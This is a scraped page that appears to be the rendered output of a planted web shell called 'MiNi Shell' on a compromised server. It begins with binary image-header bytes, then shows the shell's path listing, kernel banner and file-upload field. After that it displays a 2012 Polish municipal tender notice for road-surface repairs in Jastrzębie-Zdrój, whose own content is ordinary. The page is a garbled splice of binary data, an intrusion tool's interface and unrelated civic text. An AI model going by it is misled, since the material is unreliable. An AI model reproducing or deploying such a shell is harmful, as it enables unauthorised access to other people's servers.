JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120216/38751-N-2012.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia-Zdroju</b><br>
<b>Numer ogłoszenia: 38751 - 2012; data zamieszczenia: 16.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Jastrzębie Zdrój - Wydział Infrastruktury Komunalnej i Inwestycji , Al. Piłsudskiego 60/B503, 44-335 Jastrzębie-Zdrój, woj. śląskie, tel. 032 4785302, faks 032 4785350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jastrzebie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia-Zdroju w okresie letnim oraz zimowym. Zakres zamówienia obejmuje:
1) Remont cząstkowy nawierzchni dróg asfaltowych w okresie letnim wykonany mieszanką mineralno-grysową obejmuje:
-  wycięcie piłą mechaniczną lub sfrezowanie na głębokość minimum 5 cm z nadaniem regularnego kształtu remontowanej wyrwy
- wywiezienie rumoszu z frezowania lub odkucia na plac składowy wykonawcy
- oczyszczenie dna oraz przesmarowanie ścian remontowanej wyrwy emulsja asfaltową
- ułożenie wraz z zagęszczeniem mieszanki mineralno-bitumicznej grysowej zamkniętej gr. 5 cm 
- zamknięcie styku nawierzchni nowowykonanej z nawierzchnią istniejącą poprzez przesmarowanie krawędzi wyremontowanej wyrwy emulsją asfaltową
- utrzymanie oznakowania robót prowadzonych w pasie drogowym
2) Remont cząstkowy nawierzchni dróg asfaltowych w okresie zimowym wykonany mieszanką na zimno obejmuje:
-    obcięcie krawędzi wyrwy oraz oczyszczenie 
-    ułożenie mieszanki mineralno asfaltowej  stosowanej na zimno gr. 7 cm  z zagęszczeniem walcem lub zagęszczarką.
3) Regeneracja i powierzchniowe zamknięcie nawierzchni bitumicznej emulsją asfaltową i przesypanie kruszywem naturalnym obejmuje:
- skropienie nawierzchni emulsja asfaltową 
- równomierne rozsypanie kruszywa w miejscach skropienia
- pielęgnacja nawierzchni poprzez uzupełnienie braków lub usuwanie kruszywa niezwiązanego.
4) Regulacja pionowa studzienek dla włazów kanałowych oraz kratek ściekowych ulicznych obejmuje:
- zdjęcie kratki ściekowej lub innego przykrycia
- odkucie uszkodzonej nawierzchni i podbudowy wokół urządzenia wraz z wywozem gruzu
- wykonanie deskowania, ułożenie i zagęszczenie betonu, rozebranie deskowania
- osadzenie kratki ściekowej lub innego przykrycia na zaprawie cementowej wraz z jej przygotowaniem.
5) Uzupełnienie ubytków w nawierzchni zamkniętej frezem obejmuje:
- transport frezu na miejsce wskazane przez zamawiającego
- oczyszczenie dna wyrwy z zanieczyszczeń
- uzupełnienie wyrwy frezem z zagęszczeniem
6) Wymiana podbudowy drogi pod nawierzchnią asfaltową:
- wycięcie piłą mechaniczną lub sfrezowanie istniejącej nawierzchni asfaltowej z nadaniem regularnego kształtu remontowanej wyrwy
-  wywiezienie rumoszu z frezowania lub odkucia na plac składowy wykonawcy
- wymiana istniejącej podbudowy drogi, na podbudowę z kruszywa kamiennego, wraz z jej zagęszczeniem
- oczyszczenie oraz przesmarowanie ścian remontowanej wyrwy emulsja asfaltową
- ułożenie wraz z zagęszczeniem mieszanki mineralno-bitumicznej grysowej zamkniętej gr. 10 cm 
- zamknięcie styku nawierzchni nowowykonanej z nawierzchnią istniejącą poprzez przesmarowanie krawędzi wyremontowanej wyrwy emulsją asfaltową.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiot zamówień uzupełniających jest tożsamy z zamówieniem podstawowym. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających maksymalnie w wysokości 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.52-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> CZĘŚĆ I     3 000,00 zł   słownie : trzy tysiące złotych 00/100 .
CZĘŚĆ II    1 500,00 zł   słownie : tysiąc pięćset złotych 00/100.
CZĘŚĆ III   1 500,00 zł   słownie : tysiąc pięćset złotych 00/100.
CZĘŚĆ IV   1 500,00 zł   słownie : tysiąc pięćset złotych 00/100.
CZĘŚĆ V   1 500,00 zł   słownie : tysiąc pięćset złotych 00/100.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy to w tym okresie wykonał 1 zadanie o charakterze podobnym do przedmiotu zamówienia (tj. roboty związane z układaniem nawierzchni asfaltowych), którego wartość lub powierzchnia winna wynosić minimum dla:
               Część I - 600 000,00 zł   / pow.  4 000 m2
               Część II - 300 000,00 zł   / pow.  2 000 m2
               Część III - 300 000,00 zł   / pow.  2 000 m2
               Część IV - 300 000,00 zł   / pow.  2 000 m2
               Część V - 300 000,00 zł   / pow.  2 000 m2

UWAGA: w przypadku składania oferty na więcej niż jedną część wartość lub powierzchnia zadania wykonanego w okresie ostatnich 5 lat przed upływem terminu składania ofert nie może być mniejsza od wartości lub powierzchni określonych przez zamawiającego dla poszczególnych części, na które wykonawca składa ofertę. 
Spełnieniem warunku będzie wykazanie przez wykonawcę tylu zadań na ile części składa ofertę o wartości lub powierzchni odpowiadającej tym częściom lub wykazanie jednego zadania o wartości lub powierzchni obejmującej łącznie właściwe części.
Ocena spełniana warunku zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponować, co najmniej po jednej jednostce sprzętu niezbędnego                             do wykonania zamówienia tj. frezarką, sprężarką, walcem drogowym, samochodem ciężarowym.
UWAGA: w przypadku składania ofert na więcej niż jedną część wykonawca musi wykazać się posiadaniem wymaganego sprzętu w ilości odpowiadającej ilości części, na które składa ofertę.
Ocena spełniana warunku zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponować przy wykonywanych pracach osobą przyjmującą obowiązki kierownika robót posiadającą uprawnienia drogowe niezbędne do  wykonywania prac określonych w dokumentacji technicznej, wymagane przepisami ustawy Prawo Budowlane.
Ocena spełniana warunku zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony formularz oferty wraz z oświadczeniem o zapoznaniu się z treścią specyfikacji oraz projektem umowy oraz przyjęciu ich postanowień bez zastrzeżeń, o związaniu ofertą oraz aktualności dostarczonych zaświadczeń, zgodny w treści z wzorem stanowiącym załącznik do siwz
UWAGA: dla każdej z CZĘŚCI jest osobny formularz ofertowy i w ofercie należy przedłożyć formularz dotyczący tej części, na którą wykonawca składa ofertę.
2)	całkowita wartość realizacji zamówienia wg załącznik do siwz
3)	dowód wniesienia wadium w wysokości:
CZĘŚĆ I     3 000,00 zł   słownie : trzy tysiące złotych 00/100 .
CZĘŚĆ II    1 500,00 zł   słownie : tysiąc pięćset złotych 00/100.
CZĘŚĆ III   1 500,00 zł   słownie : tysiąc pięćset złotych 00/100.
CZĘŚĆ IV   1 500,00 zł   słownie : tysiąc pięćset złotych 00/100.
CZĘŚĆ V   1 500,00 zł   słownie : tysiąc pięćset złotych 00/100.
(w przypadku, gdy wybrana forma wnoszenia wadium wymaga złożenia go w Wydziale Księgowości Budżetowej Urzędu Miasta, kopię potwierdzenia złożenia wadium należy umieścić w ofercie), 
4)    szczegółowe kosztorysy ofertowe na ceny jednostkowe, 
5)  pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, z którego wynika zakres, podpisane przez osoby uprawnione do reprezentowania Firmy (jeżeli wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnika - jak w punkcie  10, 11 siwz),
6)   pisemne zobowiązanie do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy  wykonywaniu zamówienia (przykładowy wzór - załącznik do siwz)
UWAGA: pełnomocnictwo i pisemne zobowiązanie powinno być przedstawione w oryginale lub kserokopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający zastrzega sobie możliwość dokonania zmian postanowień niniejszej umowy:
a)	w zakresie osób posiadających wymagane uprawnienia w przypadku zaistnienia zdarzeń losowych (W takim przypadku wykonawca zobowiązany będzie do zaproponowania osoby legitymującej się uprawnieniami wymaganymi w pkt. 8.2. ppkt.b specyfikacji istotnych warunków zamówienia), 
b)	w zakresie innych podmiotów, na zasobach których wykonawca się opierał wykazując spełnienie warunków udziału w postępowaniu, a podwykonawca wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania dotychczasowy podwykonawca,
c)	w zakresie podwykonawców, wykazanych na etapie złożonej oferty lub, których konieczność ujawnienia wynikła na etapie realizacji zamówienia, którym wykonawca powierzył lub ma zamiar powierzyć wykonanie części zamówienia, pod warunkiem przedłożenia projektu umowy, o którym mowa w art. 647 1 Kodeksu cywilnego i uzyskania zgody ze strony Zleceniodawcy.
2.	Zmiana postanowień zawartej umowy dokonywana będzie w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jastrzebie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Jastrzębie - Zdrój, Al. Piłsudskiego 60 pok. B503, 44-335 Jastrzębie - Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2012 godzina 10:50, miejsce: Urząd Miasta Jastrzębie - Zdrój, Al. Piłsudskiego 60 pok. B503, 44-335 Jastrzębie - Zdrój.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia Zdroju w strefie A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia Zdroju w strefie A.  Zamówienie obejmuje wykonanie łącznie: około 4 900 m2 powierzchni remontowanych wyrw i spękań -
w okresie letnim, około 100 m2 powierzchni remontowanych wyrw i spękań - w okresie zimowym, naprawę spękań około 100 m2, regulację 10 szt. studni oraz 10 szt. kratek ściekowych ulicznych, uzupełnienie ubytków frezem około 500 m2, wymiana podbudowy około 200 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.52-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia Zdroju w strefie B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia Zdroju w strefie B.            Zamówienie obejmuje wykonanie łącznie: około 2 300 m2 powierzchni remontowanych wyrw i spękań - w okresie letnim, około 100 m2 powierzchni remontowanych wyrw i spękań - w okresie zimowym, naprawę spękań około 100 m2, regulację 10 szt. studni oraz 10 szt. kratek ściekowych ulicznych, uzupełnienie ubytków frezem około 500 m2, wymiana podbudowy około 200 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.52-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia Zdroju w strefie C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia Zdroju w strefie C.                       Zamówienie obejmuje wykonanie łącznie: około 2 300 m2 powierzchni remontowanych wyrw i spękań - w okresie letnim, około 100 m2 powierzchni remontowanych wyrw i spękań - w okresie zimowym, naprawę spękań około 100 m2, regulację 10 szt. studni oraz 10 szt. kratek ściekowych ulicznych, uzupełnienie ubytków frezem około 500 m2, wymiana podbudowy około 200 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.52-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia Zdroju w strefie D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia Zdroju w strefie D.                       Zamówienie obejmuje wykonanie łącznie: około 2 300 m2 powierzchni remontowanych wyrw i spękań - w okresie letnim, około 100 m2 powierzchni remontowanych wyrw i spękań - w okresie zimowym, naprawę spękań około 100 m2, regulację 10 szt. studni oraz 10 szt. kratek ściekowych ulicznych, uzupełnienie ubytków frezem około 500 m2, wymiana podbudowy około 200 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.52-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia Zdroju w strefie E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remonty cząstkowe nawierzchni dróg i ulic na terenie miasta Jastrzębia Zdroju w strefie E.                       Zamówienie obejmuje wykonanie łącznie: około 2 300 m2 powierzchni remontowanych wyrw i spękań - w okresie letnim, około 100 m2 powierzchni remontowanych wyrw i spękań - w okresie zimowym, naprawę spękań około 100 m2, regulację 10 szt. studni oraz 10 szt. kratek ściekowych ulicznych, uzupełnienie ubytków frezem około 500 m2, wymiana podbudowy około 200 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.52-0.</p></li>
